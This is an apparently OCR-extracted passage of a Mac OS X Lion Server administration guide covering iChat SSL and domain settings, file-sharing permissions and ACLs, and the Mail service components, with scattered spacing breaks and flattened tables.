Using serveradmin, you can secure server-to-server communication with certificates. Lion Server includes a preinstalled, default, s elf-signed certificate or you can select your own certificate. The selected certificate is used for client-to-server communications on ports 5222 and 5223 and for server-to-s erver communications. Jabber provides the following ports: 5222, which accepts TLS connections if an SSL certificate is enabled 5223, which accepts legacy SSL connections if an SSL certificate is enabled SSL encrypts your chat mess age over the network between client-to-server and server-to-s erver connections . However, if your iChat Server is logging chat mes sages, your messages are stored in an unencrypted format that can be eas ily viewed by the server administrator. For information about message logging, see Log all iChat mes sages. This restricts S2S communication and allows only iChat to connect with servers that support encrypted connections through SSL/TLS. This means that only s ervers that s upport TLS are allowed to communicate with your iChat Server. This option requires a Secure Socket Layer (SSL) certificate to be ins talled, which is us ed to secure the S2S federation. For more information, see Us e SSL encryption with iChat service.
1. If SSL encryption hasn't been enabled yet, use serveradmin via the Terminal app to set the certificate locations to require encryption. sudo serveradmin settings jabber:sslCAFile = "Certificate authority pem file location" sudo serveradmin settings jabber:sslKeyFile = "Key file pem location" The default locations for Certificate authority pem file location and Key file pem location are /etc/certificates /cert.chain.pem and /etc/certificates/cert.concat.pem. Command example: sudo serveradmin settings jabber:sslCAFile = "/etc/certificates/example.private.2413CD435CEA9484 sudo serveradmin settings jabber:sslKeyFile = "/etc/certificates/example.private.2413CD435CEA948 2. Use serveradmin via the Terminal app to require encrypted server-to-server communication. sudo serveradmin settings jabber:requireSecureS2S = "setting" The default value for setting is no. The other poss ible value is yes. Command example: sudo serveradmin settings jabber:requireSecureS2S = "yes"
iChat serv ice
Set up iChat service on virtually hosted domains

You can provide iChat s ervice to users of virtual domains on the server. iChat requires that your host have a hos t name to be used as the Jabber realm by the iChat Server that is resolvable us ing DNS. This host name is used as the Jabber realm by the iChat Server, and clients us e this realm to connect to the s ervice. Clients use a Jabber Identifier (JID) to authenticate and interact with the server. The JID us es the format us er@realm (for example, chatuser@chats erver.example.com). In this example, your iChat Server would be configured to host the realm chats erver.example.com. DNS resolution directs clients to your server when they resolve that host name. To support multiple realms , DNS should be configured appropriately. For more information, s ee Overview of DNS s etup.
Use serveradmin via the Terminal app to add hosted chat domains. sudo serveradmin settings jabber:hostsCommaDelimitedString = "FQDN,FQDN2" The default value for FQDN is the iChat server's hos t name. The other pos sible values are fully qualified domain names separated by commas . Command example: sudo serveradmin settings jabber:hostsCommaDelimitedString = "chatserver.example.com,chat.example
iChat serv ice
Set administrative permissions for iChat

Use Server Admin to set SACL permis sions for adminis trators to monitor and manage iChat.
1. Open Server Admin and connect to the s erver. 2. Click Acces s. 3. Click Administrators. 4. Select the level of restriction you want for the services . To restrict acces s to all services, s elect For all services. To s et access permissions for individual services, select For s elected s ervices below and select the services from the Service list. 5. Click the Add button (+) to open the Us ers & Groups window. 6. Drag us ers and groups to the list from the Users & Groups window. 7. Set the users permission. To grant administrator access, choose Adminis ter from the Permission pop-up menu next to the user name. To grant monitoring access , choos e Monitor from the Permission pop-up menu next to the user name. 8. Click Save.
File Sharing
Enable file sharing for a folder

To let users access a s pecific folder from a computer or iOS device, you designate that folder as a shared folder. You mus t enable file sharing before you can designate shared folders. Some folders are enabled as shared folders by default.
These are indicated in the main File Sharing window of Server app.
1. To add a new shared folder, click plus (+) at the bottom of the window. 2. Navigate to your chosen volume or folder. 3. Click Choose. The folder you selected is now enabled as a shared folder. If File Sharing is off when you add a new shared folder, File Sharing will be turned on.
RELATED INFORMATION
Control access to a shared folder Choose which kinds of computers and devices can acces s file shares Enable s hared home folders
File Sharing
Control access to a shared folder

You can enable or dis able access to each shared folder listed in the File Sharing pane of Server App. You can specify which users and groups have read and write access to each shared folder and its contents. You can give access to all us ers with accounts on your server, or only the specific users and groups you select. You can also allow guest access for any shared folder. Enable file sharing if it isnt already enabled.
1. In the File Sharing pane of the Server app, s elect the shared folder in the list. 2. Double-click the selected folder or click the pencil icon. 3. To change the access users or groups have to a shared folder and its contents, s elect "Read & Write," "Read Only," "Write Only," or "No Access " next to that user or group name, then change it to the needed access level. You can also add or delete users and groups that have access to a s hared folder by clicking Add (+) or Delete (). 4. To let users acces s a folder without logging in, select the checkbox labeled "Allow guest users to acces s this s hare." The access level changes the next time the user or group connects to the shared folder.
RELATED INFORMATION
Create a user account Kinds of permissions Access control lists (ACLs)
File Sharing
Choose which kinds of computers and devices can access file shares
File s haring service in Lion Server lets you specify a protocol that other computers or devices us e to access your file s hares. Disabling or enabling certain protocols lets you determine which kinds of computer devices connect to your server. Enable file sharing if it isnt already enabled.
1. In the File Sharing pane of the Server app, s elect the shared folder in the list. 2. Double-click the selected folder or click the pencil icon. 3. Click to select the checkboxes for s haring with Mac, Windows, or iOS devices. To us e a file share as a home folder, enable Mac or Windows as needed for the s hare. You can s elect one or all three file sharing protocols for any share. If you don't select a protocol, the file share becomes unavailable. Users need to log out and log in again before using the shared folder as their home folder.
RELATED INFORMATION
Enable s hared home folders
File Sharing
Enable shared home folders

Computers on the s ame network as your file sharing server can us e shared folders for user home folders. Designating a shared folder as a home folder caus es the us er's computer to connect to your file sharing server, and when the us er logs in, they begin using that shared folder as their home folder. Enable file sharing if it isnt already enabled.
1. In the File Sharing pane of the Server app, s elect the shared folder in the list. 2. Double-click the folder or click the pencil icon. 3. Click to select "Make available for home directories ." 4. Choose "AFP for Mac computers only" or "SMB for Mac and Windows computers ," depending on the computer the users use to connect to your file sharing s erver. Users must log out and log in again before using the shared folder as their home folder.
RELATED INFORMATION
Choose which kinds of computers and devices can acces s file shares
File Sharing
File permissions
About permissions
Permissions in the Mac OS X Lion environment

An important aspect of computer s ecurity involves granting and denying permissions. A permission is the ability to perform a specific operation, s uch as gaining acces s to data or executing code. Permissions are granted at the level of folders, files, or applications. Us e the Server app to set up file s ervice permissions. The term privileges refers to the combination of ownership and permis sions, while the term permissions refers to the permission settings that each user category can have (Read & Write, Read Only, Write Only, and None). If youre new to Mac OS X Lion and arent familiar with UNIX-based sys tems, there are differences in the way ownership and permissions are handled compared to Windows . To increase security and reliability, Mac OS X Lion sets many system folders (for example, /Library/) to be owned by the root user (literally, a user named root). You cant change or delete files and folders unless youre logged in as root. Be carefulthere are few res trictions on what you can do when you log in as root, and changes to s ystem data can cause problems. An alternative to logging in as root is to us e the sudo command. Note: The Finder calls the root user system. By default, files and folders are owned by the user who creates them. After theyre created, items keep their privileges (a combination of ownership and permis sions) even when moved, unles s the privileges are explicitly changed by their owner or an administrator. Therefore, new files and folders you create arent accessible by users if theyre created in a folder that us ers dont have privileges for. When setting up s hare points, make sure that items have the correct access privileges for the users you want to s hare them with.
File Sharing
File permissions
About permissions
Kinds of permissions
Mac OS X Lion s upports two kinds of file and folder permiss ions: Standard Portable Operating System Interface (POSIX) permissions
Access Control Lists (ACLs) Standard POSIX permis sions let you control acces s to files and folders based on three categories of users: Owner, Group, and Others. Although thes e permis sions give you s ome control over who can acces s a file or a folder, they lack the flexibility and granularity that many organizations require in dealing with complex user environments. This is where ACLs come in handy. An ACL provides an extended set of permis sions for a file or folder, and lets you s et multiple users and groups as owners . ACLs are als o compatible with Windows Server 2003, Windows XP, Windows Vis ta, and Windows 7 giving you added flexibility in a multiplatform environment.
File Sharing
File permissions
About permissions
Standard permissions
There are four types of standard POSIX access permiss ions that you can as sign to a s hare point, folder, or file: Read & Write, Read Only, Write Only, and None. The following table shows how these permissions affect user access to shared items (files, folders, and share points).
Users can Open a shared file Copy a shared file Edit a shared file Move items to a shared folder or share point Move items from a shared folder or share point Yes No No No Read & Write Yes Yes Yes Yes Read Only Yes Yes No No Write Only No No No Yes None No No No No
Note: WebDAV has separate permis sions settings . Explicit permissions Share points and the shared items they contain (including folders and files) have separate permiss ions. If you move an item to a different folder, it keeps its permissions and doesnt adopt the permissions of the folder where you moved it. In the following illus tration, the second folder (Designs) and the third folder (Documents) were assigned permis sions different from those of their parent folders :
The user categories Owner, Group, and Others You can as sign standard POSIX access permiss ions separately to three categories of users: OwnerA user who creates an item (file or folder) on the file server is its owner and automatically has Read & Write permis sions for that folder. By default, the owner of an item and the s erver administrator are the only us ers who can change its access privileges (but you can enable a group or others to us e the item). The administrator can also transfer ownership of the shared item to another user. Note: When you copy an item to a drop box on a Mac file server, ownership of the item doesnt change. Only the owner of the drop box or root has access to its contents. GroupYou can put us ers who need the same access to files and folders in group accounts. Only one group can be assigned access permiss ions to a shared item. For more information about creating groups, s earch Help for Us ers & Groups. OthersOthers is any us er (registered user or gues t) who can log in to the file server.
Hierarchy of permissions If a user is included in more than one category of users, each of which has different permiss ions, these rules apply: Group permissions override Others permis sions. Owner permis sions override Group permis sions . For example, when a user is the owner of a s hared item and a member of the group ass igned to it, the user has the permissions ass igned to the owner. The more restrictive permiss ions always take precedence. For example, if a user belongs to a group that has No Acces s assigned to an item while the Others permis sions are set to Read & Write acces s, the item with No Acces s privilege overrides the Others setting, denying the user access to the item. Client users and permissions Users of AppleShare Client s oftware can set access privileges for files and folders they own. Users who use Windows file sharing services can als o set access privileges. Standard permission propagation The Server app lets you s pecify which standard permiss ions to propagate. For example, you can propagate only the permission for Others to all des cendants of a folder and leave the permis sions for Owner and Group unchanged. For more information, see Propagate access permiss ions.
File Sharing
File permissions
About permissions
Access control lists (ACLs)

When standard POSIX permissions arent enough, us e access control lists (ACLs). An ACL is a list of acces s control entries (ACEs), each specifying the permissions to be granted or denied to a group or us er and how thes e permis sions are propagated throughout a folder hierarchy. ACLs in Mac OS X Lion let you set file and folder access permis sions for multiple users and groups in addition to standard POSIX permissions . This makes it easy to set up collaborative environments with smooth file sharing and uninterrupted workflows, without compromising security. ACLs provide an extended set of permis sions for a file or folder, to give you more granularity when assigning privileges than standard permiss ions would provide. For example, rather than giving a us er full write permiss ions, you can restrict him or her to create only folders and not files. Only the Mac OS Extended volume format provides local file sys tem support for ACLs. In addition, only SMB and AFP protocols provide network file system s upport for ACLs in Windows and Apple networks , respectively. Apples ACL model supports 13 permis sions for controlling access to files and folders , as described in the following table.
Permission name Change Permissions Take Ownership Type Administration Administration Description User can change standard permissions. User can change the files or folders ownership to himself or herself. Read Attributes Read User can view the files or folders attributes (for example, name, date, and size). Read Extended Attributes Read User can view the files or folders attributes added by third-party developers. List Folder Contents (Read Data) Traverse Folder (Execute File) Read Permissions Read Read Read User can list folder contents and read files. User can open subfolders and run a program. User can view the files or folders standard permissions using the Get Info or T erminal commands. Write Attributes Write User can change the files or folders standard attributes. Write Extended Attributes Write User can change the files or folders other
attributes. Create Files (Write Data) Create Folder (Append Data) Delete Delete Subfolders and Files Write Write Write Write User can create files and change files. User can create subfolders and add data to files. User can delete file or folder. User can delete subfolders and files.
In addition to these permissions , the Apple ACL model defines four types of inheritance that specify how these permiss ions are propagated: Apply to this folder: Apply (Adminis tration, Read, and Write) permissions to this folder. Apply to child folders: Apply permiss ions to subfolders . Apply to child files: Apply permissions to the files in this folder. Apply to all descendants: Apply permiss ions to descendants. To learn how this option works with the previous two, see Access control entries (ACEs). The ACL use model The ACL use model focuses on access control at the folder level, with most ACLs applied to files as the result of inheritance. Folder-level control determines which users have acces s to the contents of a folder. Inheritance determines how a defined set of permissions and rules pas s from the container to the objects in it. Without this model, administration of acces s control would quickly become a nightmare, because you would need to create and manage ACLs on thous ands or millions of files. Controlling access to files through inheritance also frees applications from maintaining extended attributes or explicit ACEs when saving a file, because the s ystem applies inherited ACEs to files. For information about explicit ACEs, s ee Access control entries (ACEs). ACLs and standard permissions You can set ACL permiss ions for files and folders in addition to s tandard permissions. For more information about how Mac OS X Lion us es ACL and standard permiss ions to determine what users can and cannot do to a file or folder, see Access control entries (ACEs). ACL management In Mac OS X Lion, you create and manage ACLs in the Server app. The Get Info window in the Finder displays the logged-in users effective permissions. For information about setting up and managing ACLs , see Set folder acces s permis sions and Control access to a shared folder. In addition to using the Server app to set and view ACL permiss ions, you can also us e the ls and chmod command-line tools. For information, see their man pages. You define ACLs for s hare points, files, and folders using the Server app.
File Sharing
File permissions
About permissions
Access control entries (ACEs)

An ACE is an entry in an ACL that specifies, for a group or a user, access permissions to a file or folder and the rules of inheritance. Whats stored in an ACE An ACE contains the following fields : User or Group. An ACE stores a univers ally unique ID for a group or us er, which permits unambiguous res olution of identity. Type. An ACE supports two permiss ion types , Allow and Deny, which determine whether permiss ions are granted or denied. In the Server app, you can only set the Allow permiss ions type. You can us e the ls and chmod command-line tools to set the deny permis sions type. For information, s ee their man pages . Permission. This field s tores the s ettings for the 13 permissions supported by the Apple ACL model.
Inherited. This field specifies whether the ACE is inherited from the parent folder. Applies To. This field specifies what the ACE permis sion is for. Explicit and inherited ACEs The Server app supports two types of ACEs : Explicit ACEs, which are thos e you create in an ACL. See Set folder access permissions. Inherited ACEs, which are ACEs you created for a parent folder that were inherited by a descendant file or folder. Note: Inherited ACEs cannot be edited unless you make them explicit. Understanding inheritance ACL inheritance lets you specify how permissions pass from a folder to its descendants. The Apple ACL inheritance model The Apple ACL inheritance model defines four options that you select or deselect in the Server app to control the application of ACEs (in other words, how to propagate permiss ions through a folder hierarchy):
Inheritance option Apply to this folder Apply to child folders Apply to child files Apply to all descendants Description Apply (Administration, Read, and Write) permissions to this folder Apply permissions to subfolders Apply permissions to the files in this folder Apply permissions to all descendants Note: If you want an ACE to apply to all descendants without exception, you must select the Apply to child folders and Apply to child files options in addition to this option.
Mac OS X Lion propagates ACL permissions at two well-defined times : At file or folder creation timewhen you create a file or folder, the kernel determines what permissions the file or folder inherits from its parent folder. When initiated by administrator toolsfor example, when using the Propagate Permissions option in the Server app. The following figure shows how the Server app propagates two ACEs (managers and design_team) after ACE creation. Bold text represents an explicit ACE and regular text represents an inherited ACE.
ACL inheritance combination When you set inheritance options for an ACE in the Server app, you can choos e from 12 unique inheritance combinations for propagating ACL permissions.
Inheritance Apply to this folder Apply to child files Apply to child files Apply to all descendants
Inheritance
Apply to this folder Apply to child folders Apply to child files Apply to all descendants Inheritance Apply to this folder Apply to child folders Apply to child files Apply to all descendants
ACL permission propagation The Server app lets you force the propagation of ACLs. Although this is done automatically by the Server app, there are cases when you might want to manually propagate permiss ions: You can propagate permissions to handle exceptions. For example, you might want ACLs to apply to all descendants except for a subtree of your folder hierarchy. In this case, you define ACEs for the root folder and s et them to propagate to descendants. Then, you select the root folder of the subtree and propagate permissions to remove the ACLs from descendants of that subtree. In the following example, the items in white had their ACLs removed by manually propagating ACLs .
You can propagate permissions in order to reapply inheritance in cases where you removed a folders ACLs and decided to reapply them. You can propagate permissions to clear all ACLs at once instead of going through a folder hierarchy and manually removing ACEs . When you propagate permissions , the permissions of bundles and root-owned files and folders arent changed. For more information about how to manually propagate permissions , see Propagate access permissions. Rules of precedence Mac OS X Lion uses the following rules to control access to files and folders :
Without ACEs, POSIX permis sions apply. If a file or folder has no ACEs defined for it, Mac OS X Lion applies standard POSIX permis sions . With ACEs, order is important. If a file or folder has ACEs defined for it, Mac OS X Lion starts with the first ACE in the ACL and works its way down the list until the requested permission is satisfied or denied. You can change the ACE order from the command line us ing the chmod command. Allow permiss ions are cumulative. When evaluating Allow permiss ions for a us er in an ACL, Mac OS X Lion defines the users permis sions as the union of all permissions assigned to the user, including standard POSIX permissions . After evaluating ACEs, Mac OS X Lion evaluates the standard POSIX permissions defined for the file or folder. Then, based on the evaluation of ACL and s tandard POSIX permissions, Mac OS X Lion determines the type of access a user has to a s hared file or folder.
File Sharing
File permissions
About permissions
Permissions in practice
Mac OS X Lion combines traditional POSIX permissions with ACLs . This combination provides great flexibility and fine granularity in controlling access to files and folders . However, if youre not careful in how you assign privileges, it may be hard for you to keep track of how permissions are assigned. With 17 permiss ions, you can choose from a staggering 98,304 combinations. Add to that a sophis ticated folder hierarchy, many users and groups , and many exceptions, and you have a recipe for cons iderable confusion. The following are useful tips and advice to help you get the most out of access control in Mac OS X Lion. Manage permissions at the group level Ass ign permis sions to groups firs t, and assign permiss ions to individual users only when there is an exception. For example, you can assign all teachers in a s chool district Read and Write permissions to a s pecific share point, but deny Anne Johnson, a temporary teacher, permis sion to read a specific folder in the share points folder hierarchy. Using groups is the most efficient way of ass igning permissions. After creating groups and ass igning them permissions , you can add or remove users without reassigning permis sions. Gradually add permissions Ass ign only neces sary permissions and then add permissions only when needed. As long as you us e Allow permiss ions, Mac OS X Lion combines the permiss ions. For example, you can assign the Students group partial reading permissions on an entire share point. Then, where needed in the folder hierarchy, you can give the group more read and write permiss ions. Use the deny rule only when necessary When Mac OS X Lion encounters a Deny permission, it stops evaluating other permiss ions the user might have for a file or folder and applies the Deny permis sion. Therefore, use Deny permissions only when absolutely necessary. Keep a record of these Deny permissions s o you can delete them when they arent needed. Always propagate permissions Inheritance is a powerful feature, s o take advantage of it. By propagating permis sions down a folder hierarchy, you s ave yourself the time and effort required to manually ass ign permis sions to des cendants. Protect applications from being modified If you share applications, make sure you set their permiss ions so that no one except a trusted few can change them. This is a vulnerability that attackers can exploit in order to introduce viruses or Trojan horses in your environment. Keep it simple You can complicate file access management unnecess arily, if youre not careful. Keep it simple. If s tandard POSIX permissions do the job, use those, but if you must use ACLs, avoid customizing permiss ions if you dont need to. Use simple folder hierarchies if feasible. A little s trategic planning can help you create effective and manageable shared hierarchies.
File Sharing
File permissions
About permissions
Security considerations
The mos t effective method of s ecuring your network is to assign correct privileges for each file, folder, and share point you create. Restricting access to file services You can us e the Server app to restrict which us ers or groups have acces s to files, folders, and s hare points. Restricting access to everyone Be careful when creating and granting access to share points , es pecially if youre connected to the Internet. Granting access to Everyone could expos e your data to anyone on the Internet. Restricting guest access When you configure any file s ervice, you can turn on guest access. Gues ts are us ers who connect to the server anonymously without entering a user name or pas sword. Users who connect anonymous ly are res tricted to files and folders that have privileges set to Everyone. To protect your information from unauthorized access, and to prevent people from introducing software that might damage your information or equipment, take the following precautions by using File Sharing in the Server app: Depending on the controls you want to place on guest access to a share point, consider the following options: Set privileges for Everyone to None for files and folders that gues ts s houldnt access . Items with this privilege setting can be acces sed only by the items owner or group. Put all files available to gues ts in one folder or set of folders and then as sign the Read Only privilege to the Everyone category for that folder and each file in it. Ass ign Read & Write privileges to the Everyone category for a folder only if gues ts must be able to change or add items in the folder. Make sure you keep a backup copy of information in this folder. Dis able acces s to guests or anonymous users over AFP and SMB. Share individual folders instead of entire volumes. The folders should contain only those items you want to s hare.
File Sharing
File permissions
Manage permissions

You can set file and folder acces s permis sions with the Server app. Mac OS X Lion provides two ways to control access to files and folders: s tandard permissions and ACL permiss ions. Standard permiss ions provide basic control. ACL permissions provide more flexibility and control, but are more complex. Set standard permissions You can us e the Server app to set standard permiss ionsRead & Write, Read Only, Write Only, or Noneto control access to a folder and its contents. You can set different permissions for one user (the owner), one group, and all other us ers who log in. You can als o set standard permiss ions on individual files. Standard permissions are als o called POSIX permissions. 1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder whos e access permiss ions you want to change, and then choos e Edit Permissions from the Action pop-up menu. 3. To grant acces s to a different user, double-click the current us er name and enter a different user account name. As you type, the Server app looks up matching user accounts and dis plays them in lis t. Clicking a lis ted user grants access permissions to that user. 4. To grant acces s to a different group, double-click the current group name and type the name of the new group. As you type, the Server app looks up matching group accounts and displays them in a list. Clicking a listed group grants acces s permis sions to it. 5. To change the permis sion level for the user, group, or others, click the current setting in the Permission column and choose a
setting from the pop-up menu. The permis sion level you set for Others applies to any user who logs in but isnt the s pecified us er or a member of the specified group. Set ACL permissions You can us e the Server app to set ACL permissions for a folder or a file. An ACL cons is ts of Acces s Control Entries (ACEs), which you can add and change. Each entry applies to a specific us er or group. For each entry, you can set 13 permissions, giving you much finer control over access than you have with standard permis sions. For example, entries in an ACL can grant delete permission s eparately from write permission, so a us er can edit a file but cant delete it. The firs t entry in the list takes precedence over the second, which takes precedence over the third, and so on. For example, if the first entry denies a user the right to edit a file, other entries that allow the same us er editing permissions are ignored. The entries in the ACL also take precedence over standard permiss ions. 1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder or file whose access permissions you want to change, then choose Edit Permiss ions from the Action pop-up menu. 3. To add an entry, click the Add button (+) and enter the name of the user or group you want to set specific access permissions for. As you type, the Server app looks up matching user and group accounts and dis plays them in a lis t. Clicking a user or group grants acces s permis sions to the user or group. 4. To change the permis sion level for an entry, click the current s etting in the Permission column and choos e a setting from the pop-up menu.
Choice Full Control Read & Write: Read: Write: Custom: Description Has full administration, read, write, and inheritance permissions. Has full read, write, and inheritance permissions. Has full read and inheritance permissions. Has full write and inheritance permissions. Doesnt have full administration, read, write, or inheritance permissions.
By default, each new entry has full read and inheritance permissions. 5. To change detailed permission s ettings for an entry, click the disclosure triangle next to the entry, optionally click the additional disclosure triangles that appear, and s elect or deselect permission s ettings. For information about the detailed permission settings , see Access control lists (ACLs) and Access control entries (ACEs).
RELATED TOPIC
Remove an ACL entry
File Sharing
File permissions
Manage permissions
Propagate access permissions

You can us e the Server app to propagate a folders permiss ions to all the folders and files it contains . You can s pecify which standard permiss ions to propagate: owner name, group name, owner permiss ions, group permissions, and permissions for others. You can propagate a folders complete ACL, but you cant propagate individual entries that cons titute the ACL.
1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder whos e access permiss ions you want to propagate, and then choose Propagate Permissions from the Action
pop-up menu. 3. Select the permiss ions you want to propagate, and then click OK. Important: Propagation begins as soon as you click OK, and you cant undo propagation. Before clicking OK, make sure you select the folder and permiss ion settings you intend.
RELATED TOPICS
Remove a folders inherited ACL entries Remove an ACL entry
File Sharing
File permissions
Manage permissions
Remove an ACL entry

You can us e the Server app to remove ACL permis sion entries youve added. Each entry defines a us ers or groups access permission to a folder or file.
1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu. 3. To remove an entry from the permission list, select the entry and click the Delete button ().
RELATED TOPIC
File Sharing
File permissions
Manage permissions
Sort an ACL canonically

When sorting an ACL canonically, the Server app firs t lis ts all entries that deny permiss ion, then the entries that grant permission. ACL entries that deny permis sion have a permission type of Deny. Entries that grant permission have a permiss ion type of Allow. All ACL entries created with the Server app are the Allow type. Permiss ions of the Deny type can exist on disks used with Mac OS X v10.6 or earlier. Permissions of the Deny type can be created on Lion Server dis ks by using the chmod command-line tool. For information about chmod, s ee its man page.
1. In the Server app s idebar, s elect the server, and then click Storage. 2. Select the folder or file whose ACL list you want to sort, and then choos e Edit Permissions from the Action pop-up menu. 3. Choose Sort Access Control Lis t Canonically from the Action pop-up menu in the Edit Permis sions dialog.
RELATED TOPIC
File Sharing
File permissions
Manage permissions

If you dont want inherited ACL entries to apply to a folder or file, you can remove those entries using the Server app. Unlike explicit ACL entries, inherited ACL entries appear dimmed in the Server apps dialog for editing acces s permis sions.
1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. Choose Remove Inherited Entries from the Action pop-up menu in the Edit Permis sions dialog.
RELATED TOPICS
Apply ACL inheritance to folders and files Make inherited ACL entries explicit Set folder access permissions
File Sharing
File permissions
Manage permissions
Make inherited ACL entries explicit

If you want to change inherited ACL entries for a folder or file, you must make the inherited entries explicit.
1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu. 3. Choose Make Inherited Entries Explicit from the Action pop-up menu in the Edit Permissions dialog. You can now edit the ACL entries.
RELATED TOPICS
Remove a folders inherited ACL entries Set folder access permissions
File Sharing
File permissions
Manage permissions
Apply ACL inheritance to folders and files

If you removed all the ACL entries from a folder or file and want to res tore inherited entries, you can use the Server app to propagate the parent folders ACL. All des cendants of the parent folder inherit the propagated ACL.
1. In the Server sidebar, select the server and then click Storage. 2. Select the parent folder of the item whos e ACL inheritance you want to restore, and then choos e Propagate Permiss ions from the Action pop-up menu. 3. Select the Access Control Lis t option, deselect all other options, and then click OK. Important: Propagation begins as soon as you click OK, and you cant undo propagation. Before clicking OK, make sure you select the folder and permiss ion settings you intend.
RELATED TOPIC
File Sharing
File permissions
Manage permissions
Common folder permissions

When sharing files and folders between computers, you can set custom permiss ions to grant or restrict acces s to those files and folders. Before you begin setting custom file and folder permis sions, you might want to investigate how the file and folder are to be shared, who has access , and what type of access you want users to have. A recommended way to manage file and folder permis sions is to create groups of us ers who share the same privileges. Depending on your network environment, you can us e standard permiss ions (als o referred to as POSIX permissions), ACL, or both to manage file or folder access . The following table shows examples of the standard permiss ions and ACL permissions necessary to configure s ome common
folder-sharing settings.
Folder Drop box ACL (Ev eryone) Permission Type: Allow Select the following checkboxes: Traverse Folder Create Files Create Folder All inheritance options Backup share Permission Type: Allow Select the following checkboxes: List Folder Contents Create Files Create Folder Set the owner to root and set the group to admin. Owner: read, write, execute Group: read only Other: read only POSIX Owner: read, write, execute Group: read, write, execute Other: write Set the owner to root and set the group to admin.
Owner: read, write, execute Group: read, write, execute Other: no permissions
Home folder
Permission Type: Deny Delete Apply to this folder Apply to all descendants
Mail
Mail service architecture

Mail s ervice in Mac OS X Lion allows network users to send and receive mail over your network or across the Internet. Mail s ervice sends and receives mail using the following standard Internet mail protocols: Simple Mail Trans fer Protocol (SMTP) Internet Message Access Protocol (IMAP) Post Office Protocol (POP) A standard mail client s etup us es SMTP to send outgoing mail and POP and IMAP to receive incoming mail. Mac OS X Lion includes an SMTP s ervice and a combined POP and IMAP s ervice. Mail s ervice also us es a Domain Name System (DNS) service to determine the destination IP address of outgoing mail. The following image gives an overview of how the components of Mac OS X Lion Mail s ervice interact:
Mail
Mail transfer agent (MTA)

Mail is transferred from incoming mail s torage to the mail recipients inbox by a local delivery agent (LDA). The LDA handles local delivery, making mail access ible by the users mail application. Mac OS X Lion uses Postfix as its mail transfer agent (MTA). Postfix fully supports SMTP. Your mail us ers s et their mail applications outgoing mail s erver to your Mac OS X Lion running Postfix. Pos tfix is easy to adminis ter. Its bas ic configuration can be managed through Server Admin and therefore it does not rely on editing the configuration file. Pos tfix uses multiple layers of defense to protect the s erver computer from intruders: There is no direct path from the network to the security-s ensitive local delivery tools . Postfix does not trust the contents of its queue files or the contents of its IPC mes sages. Postfix filters s ender-provided information before exporting it via environment variables. Nearly every Postfix application can run with fixed low privileges and no ability to change ID, run with root privileges , or run as any other user. Pos tfix uses the configuration files main.cf and master.cf in /etc/postfix/. When Server Admin modifies Postfix s ettings, it overwrites the main.cf file. If you make a manual change to the configuration file of Pos tfix, Server Admin overwrites your changes the next time you use it to modify the Mail service configuration. The s pool files for Postfix are located in /Library/Server/Mail/Data/spool/ and the log file is /var/log/mail.log. For more information about Postfix, see www.postfix.org. If you use another MTA (such as Sendmail), you cant configure Mail service with Mac OS X administration tools. To us e Sendmail instead of Postfix, disable the current SMTP s ervice through Postfix, then install and configure Sendmail. For more information about Sendmail, s ee www.sendmail.org.
Mail
Mail screening
After a mail delivery connection is made and the message is accepted for local delivery (relayed mail is not s creened), the mail server can screen it before delivery. Mac OS X Lion uses SpamAss ass in (from spamass assin.apache.org) to analyze the text of a message, and gives it a probability rating for being junk mail. No junk mail filter is 100% accurate in identifying unwanted mail. For this reason the junk mail filter in Mac OS X Lion does nt delete or remove junk mail from being delivered. Instead, it marks the mail as potential junk mail. The user can then decide if its really unsolicited commercial mail and deal with it accordingly. Many mail clients use the ratings that SpamAs sass in adds as a guide in class ifying mail for the us er. Mac OS X Lion uses ClamAV (from www.clamav.net) to scan mail mes sages for viruses. If a s uspected virus is found, you can deal with it in s everal ways. The virus definitions are kept up to date (if enabled) via the Internet us ing a proces s called freshclam.
RELATED INFORMATION
Mail s ervice filtering
Mail
Where mail is stored

Mail is stored in an outgoing queue awaiting transfer to a remote server or in a local mail s tore accessible by local mail users. Outgoing mail location By default, outgoing mail mess ages are stored in the following spool directory on the s tartup disk in /Library/Server/Mail/Data/spool/. This location is temporary, and the mail is stored until its transferred to the Internet. These locations can be moved to any access ible volume if you create a symlink link to the new location. Incoming mail location Mail s ervice stores each mess age as a separate file in a mail folder for each user. Incoming mail is stored on the s tartup disk in /Library/Server/Mail/Data/mail/. You can change the location of mail folders and indexes to another folder, disk, or disk partition. You can even specify a s hared volume on another server as the location of the mail folder, although using a shared volume negatively affects performance. For remotely mounted file s ystems, NFS isnt recommended. The incoming mail remains on the server until deleted by a mail user agent (MUA). Mail s torage can als o be split across multiple partitions or stored on an Xsan cluster. This can be done to scale Mail service or to facilitate data backup.
RELATED INFORMATION
Set up mail server clustering with Xs an
Mail
Local delivery agent (LDA)

Mail is transferred from incoming mail s torage to the mail recipients inbox by a local delivery agent (LDA). The LDA handles local delivery, making mail access ible by the users mail application. Two protocols are available from the Mac OS X LDA: POP and IMAP. Mac OS X Lion uses Dovecot to provide POP and IMAP service. Your mail us ers set their mail applications incoming mail s erver to your Mac OS X Lion running Dovecot. More information about Dovecot can be found at http://www.dovecot.org/. Dovecot Dovecot is an open-source enterprise mail sys tem for use in small to large enterprise environments. Dovecot developers have focus ed on s ecurity, s calability, and eas e of adminis tration. Each message is stored as a separate file in a mail folder for each user. This design gives the server advantages in efficiency, scalability, and adminis tration. User access to mail is primarily through software using IMAP or POP3.
